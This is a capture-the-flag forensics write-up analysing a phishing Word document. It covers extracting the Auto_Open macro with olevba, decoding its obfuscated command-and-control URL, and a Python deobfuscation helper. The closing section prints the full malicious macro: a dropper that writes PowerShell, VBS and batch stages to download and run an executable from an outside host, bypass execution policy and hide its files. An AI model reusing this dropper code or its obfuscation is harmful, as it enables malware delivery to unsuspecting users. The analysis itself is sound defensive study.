Giveaway

Event: Cyber Santa is Coming to Town – 2021 HackTheBox

Category: Forensics

PTS: 300

Description:

Santa’s SOC team is working overtime during December due to Christmas phishing campaigns. A new team of malicious actors is targeting mainly those affected by the holiday spirit. Could you analyse the document and find the command & control server?


The downloadable part of this challenge consists of a .docm document. One of the most common attacks involving this type of file is macro code execution, so the first thing to do is scan the document for macros.

olevba -c -d christmas_giveaway.docm

As you can see, there is definitely something in there.
Saving the first macro, Auto_Open(), by redirecting the olevba output into a file lets us take a closer look at its content (full code at the end of this writeup).

It is obviously obfuscated: procedures and variables have random-string or single-letter names (Sub h(), for example), and strings are assembled one character at a time with Chr()/Asc() calls, a classic trick for evading string-based scanners:

MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1

We will assume that the macro collects data to exfiltrate later, most likely at the end of the attack once everything it can gather has been collected.
For this reason we jump to the end of the code, looking for readable strings that help us understand what is going on.

     HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
     cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
     fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
     fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
     ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
     FVpHoEqBKnhPO = Replace("christmas", "i", "1")
     FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)

     Open XPFILEDIR For Output As #FileNumber
     Print #FileNumber, "strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO"
     Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)

     Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
     Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"

     Print #FileNumber, "objXMLHTTP.send() "

This code clearly sends a request to a host, probably our command and control server, through an objXMLHTTP object; let's try to retrieve that link.

Using an online VB.NET compiler and making a few slight modifications to that piece of code, we can easily decode the URL.
We create a new string variable called "final", remove the statements that write to a file and replace them with a print-to-console one.

' Stand-alone VB.NET version of the string-building code, ready for an online compiler
Imports Microsoft.VisualBasic

Module Decoder
    Sub Main()
        Dim final, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String
        HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
        cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
        fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
        fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
        ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
        FVpHoEqBKnhPO = Replace("christmas", "i", "1")
        FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)
        ' Same concatenation the macro writes into strRT, printed instead of saved to a file
        final = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO
        Console.WriteLine(final)
    End Sub
End Module

And this is it.
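Running the attacker's own string-building code in a compiler works, but an analyst often prefers to fold these Chr()/Asc()/Replace() expressions statically, without executing anything from the macro. The following Python script is an added example and is not part of the original writeup or of the challenge files: it tokenizes the VBA string expressions, evaluates only the string-building subset of the language (literals, Chr, Asc, Replace, the & and + operators, integer arithmetic, variable references) and ignores every other statement. MACRO_EXCERPT is constructed from the lines quoted above; the strRT line is written as a plain assignment, as it appears inside the dropped script, rather than inside a Print statement. The class and function names are my own.

```python
import re

# Static evaluator for the string-building idioms used by the macro.  Nothing
# from the macro is executed; expressions are parsed and folded the way a hand
# analysis would do it.
TOKEN_RE = re.compile(r'''\s*(?:
      (?P<str>"(?:[^"]|"")*")      # VBA string literal; "" is an escaped quote
    | (?P<num>\d+)
    | (?P<name>[A-Za-z_]\w*)
    | (?P<op>[&+\-(),])
    )''', re.VERBOSE)
ASSIGN_RE = re.compile(r'^([A-Za-z_]\w*)\s*=\s*(.+)$')
PRINT_RE = re.compile(r'^Print\s+#\w+\s*,\s*(.+)$')

FUNCS = {
    "Chr": lambda code: chr(code),
    "Asc": lambda s: ord(s[0]),
    "Replace": lambda s, old, new: s.replace(old, new),
}


def tokenize(text):
    tokens, pos, text = [], 0, text.strip()
    while pos < len(text):
        m = TOKEN_RE.match(text, pos)
        if not m:
            raise ValueError(f"cannot tokenize {text[pos:pos + 20]!r}")
        pos, kind, raw = m.end(), m.lastgroup, m.group(m.lastgroup)
        if kind == "str":
            tokens.append(("str", raw[1:-1].replace('""', '"')))
        elif kind == "num":
            tokens.append(("num", int(raw)))
        else:
            tokens.append((kind, raw))
    return tokens


class VbaStringFolder:
    """Folds assignment and Print lines; every other statement is skipped."""

    def __init__(self, env=None):
        self.env = dict(env or {})   # pre-seeded values (e.g. USER) if needed
        self.printed = []            # text the macro would write into dropped files
        self.skipped = []            # lines this folder could not resolve

    def run(self, source):
        for raw in source.splitlines():
            line = raw.strip()
            try:
                if m := ASSIGN_RE.match(line):
                    self.env[m.group(1)] = self.eval_expr(m.group(2))
                elif m := PRINT_RE.match(line):
                    self.printed.append(str(self.eval_expr(m.group(1))))
            except (ValueError, KeyError, IndexError, TypeError) as exc:
                self.skipped.append((line, str(exc)))
        return self

    def eval_expr(self, text):
        self.toks, self.pos = tokenize(text), 0
        value = self.expr()
        if self.pos != len(self.toks):
            raise ValueError(f"trailing tokens in {text!r}")
        return value

    def peek(self):
        return self.toks[self.pos] if self.pos < len(self.toks) else (None, None)

    def take(self, expect=None):
        kind, val = self.peek()
        if expect is not None and val != expect:
            raise ValueError(f"expected {expect!r}, got {val!r}")
        self.pos += 1
        return kind, val

    def expr(self):
        left = self.atom()
        while self.peek()[1] in ("&", "+", "-"):
            op = self.take()[1]
            right = self.atom()
            if op == "&":
                left = str(left) + str(right)   # & always concatenates
            elif op == "+":
                left = left + right             # str+str or int+int, as in VBA
            else:
                left = left - right
        return left

    def atom(self):
        kind, val = self.take()
        if kind in ("str", "num"):
            return val
        if kind == "name":
            if self.peek()[1] == "(":           # function call: Chr/Asc/Replace
                self.take("(")
                args = [self.expr()]
                while self.peek()[1] == ",":
                    self.take(",")
                    args.append(self.expr())
                self.take(")")
                return FUNCS[val](*args)
            return self.env[val]                 # variable reference
        if val == "(":
            inner = self.expr()
            self.take(")")
            return inner
        raise ValueError(f"unexpected token {val!r}")


# Constructed excerpt: the URL-building lines quoted from the macro, the strRT
# concatenation as a plain assignment, and the PowerShell $url line from the
# first dropped stage.
MACRO_EXCERPT = r'''
HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
FVpHoEqBKnhPO = Replace("christmas", "i", "1")
FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)
strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO
Print #FileNumber, "$url  = '" + Chr(Asc("h")) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc("p")) + "://hiro-wish.com/js/bi" & "n.e" & "xe';"
'''


def recover_indicators(source=MACRO_EXCERPT, env=None):
    """Returns (folded variables, dropped-script lines, unresolved lines)."""
    folder = VbaStringFolder(env).run(source)
    return folder.env, folder.printed, folder.skipped


if __name__ == "__main__":
    variables, printed, skipped = recover_indicators()
    print("C2 URL :", variables["strRT"])
    for line in printed:
        print("dropped:", line)
    for line, why in skipped:
        print("skipped:", line[:60], "->", why)
```

The same folder can be pointed at the whole Auto_Open listing: once USER, PST1, BART and the other path variables are seeded through the env argument, every Print line of the PowerShell, VBS and batch stages comes out in cleartext, while statements it cannot fold (Environ, Val, the WMI queries) land in the skipped list instead of being silently dropped, so the analyst sees exactly what still needs a manual look.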


Full VBA code (the Auto_Open macro as extracted with olevba):

Sub Auto_Open()
    h
End Sub
Sub h()
Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR
     USER = Environ("username")
     PST1 = "adobeacd-update.p" + Chr(115) + "1"
     BART = "adobeacd-update.b" + Chr(Asc("a")) + Chr(Asc("t"))
     ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl"
     VBT1 = "adobeacd-update." + Chr(118) + "bs"
     VBTXP = "adobeacd-updatexp.v" + Chr(Asc("b")) + "s"


     MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1
     ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad"
     MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\Desktop\output3.txt"
     MY_FILDIR = "c:\Users\" + USER + "\Desktop\output2.txt"
     XPFILEDIR = "C:\Users\IEUser\Desktop\output.txt"
     XPBARTFILEDIR = "c:\Windows\Temp\" + BART

      On Error Resume Next
     SetAttr MY_FILENDIR, vbNormal

     If (Len(Dir(MY_FILENDIR)) <> 0) Then
      Kill MY_FILENDIR
     End If

     On Error Resume Next
     SetAttr MY_FILEDIR, vbNormal
     If (Dir(MY_FILEDIR) <> "") Then
      Kill MY_FILEDIR
     End If

     On Error Resume Next
     SetAttr MY_FILDIR, vbNormal
     If (Dir(MY_FILDIR) <> "") Then
      Kill MY_FILDIR
     End If

     On Error Resume Next
     SetAttr XPFILEDIR, vbNormal
     If (Dir(XPFILEDIR) <> "") Then
      Kill XPFILEDIR
     End If

     Dim FileNumber As Integer
     Dim FileNumb As Integer
     Dim FileNu As Integer
     Dim mttt As Integer
     Dim retVal As Variant
     'Dim winver As Integer
     FileNumber = FreeFile
     FileNumb = FreeFile
     FileNu = FreeFile

     Dim objWMIService As Variant
    Dim colOperatingSystems As Variant
    Dim objOperatingSystem As Variant
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
    Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
    For Each objOperatingSystem In colOperatingSystems
        SysReport = SysReport & "The operating system on this computer is " & _
            objOperatingSystem.Caption & "  (" & objOperatingSystem.Version & ")"
    Next

     Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2")
     Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
     For Each objOperatingSystem In colOperatingSystems
        winverstr = objOperatingSystem.Version
    Next


    winver = Val(winverstr)
    WaitFor (1)


If (winver > 5.5) Then
     Open MY_FILENDIR For Output As #FileNumber
     Print #FileNumber, "$hashroot = '94-4a-1e-86-99-69-dd-8a-4b-64-ca-5e-6e-bc-20-9a';"
     Print #FileNumber, "$hash = '0';"
     Print #FileNumber, "$down = N" & "ew" & "-" & Chr(79) & "bject " & Chr(Asc("S")) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;"
     Print #FileNumber, "$url  = '" + Chr(Asc("h")) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc("p")) + "://hiro-wish.com/js/bi" & "n.e" & "xe';"
     Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';"
     Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';"
     Print #FileNumber, "$down" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);"
     Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;"
     Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';"
     Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';"
     Print #FileNumber, "$batFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';"
     Print #FileNumber, "$psFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';"
     Print #FileNumber, "Start-Sleep -s 15;"
     Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c  'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e';     "
     Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force"
     Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force"
     Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force"
     Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
     Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
     Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den"
     Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }"
     Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }"
     Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }"
     Print #FileNumber, "Remove-Item $MyINvocation.InvocationName"
     Close #FileNumber

    Open MY_FILDIR For Output As #FileNumb
    Print #FileNumb, "Dim dff"
    Print #FileNumb, "dff = 68"
    Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))"
    Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")"
    Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34)
    Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")"
    Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true"
    Close #FileNumb

    Open MY_FILEDIR For Output As #FileNu
    Print #FileNu, "@echo off"
    Print #FileNu, "ping 1.1.2.2 -n 2"
    Print #FileNu, "chcp 1251"
    Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34)
    Print #FileNu, "exit"
    Close #FileNu

    SetAttr MY_FILENDIR, vbNormal
    SetAttr MY_FILEDIR, vbNormal
    SetAttr MY_FILDIR, vbNormal

    WaitFor (1)


End If

If (winver <= 5.5) Then
     Open XPBARTFILEDIR For Output As #FileNu
     Print #FileNu, "@echo off"
     Print #FileNu, "ping 1.1.2.2 -n 2"
     Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34)
     Print #FileNu, "ping 1.1.2.2 -n 2"
     Print #FileNu, "c:\Windows\Temp\444.exe"
     Print #FileNu, ":loop"
     Print #FileNu, "ping 1.1.2.2 -n 1"
     Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34)
     Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34)
     Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop"
     Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop"
     Print #FileNu, "exit"
     Close #FileNu
     WaitFor (2)
     mttt = 88

     Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String

     HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
     cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
     fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
     fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
     ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
     FVpHoEqBKnhPO = Replace("christmas", "i", "1")
     FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)

     Open XPFILEDIR For Output As #FileNumber
     Print #FileNumber, "strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO"
     Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)

     Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"
     Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False"

     Print #FileNumber, "objXMLHTTP.send() "
     Print #FileNumber, "If objXMLHTTP.Status = 200 Then"

     Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") "

     Print #FileNumber, "objADOStream.Open "
     Print #FileNumber, "objADOStream.Type = 1"
     Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody "
     Print #FileNumber, "objADOStream.Position = 0 "
     Print #FileNumber, "objADOStream.SaveToFile strTecation "
     Print #FileNumber, "objADOStream.Close "
     Print #FileNumber, "Set objADOStream = Nothing "
     Print #FileNumber, "End if "
     Print #FileNumber, "Set objXMLHTTP = Nothing"
     Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")"
     Close #FileNumber

     WaitFor (1)




End If
End Sub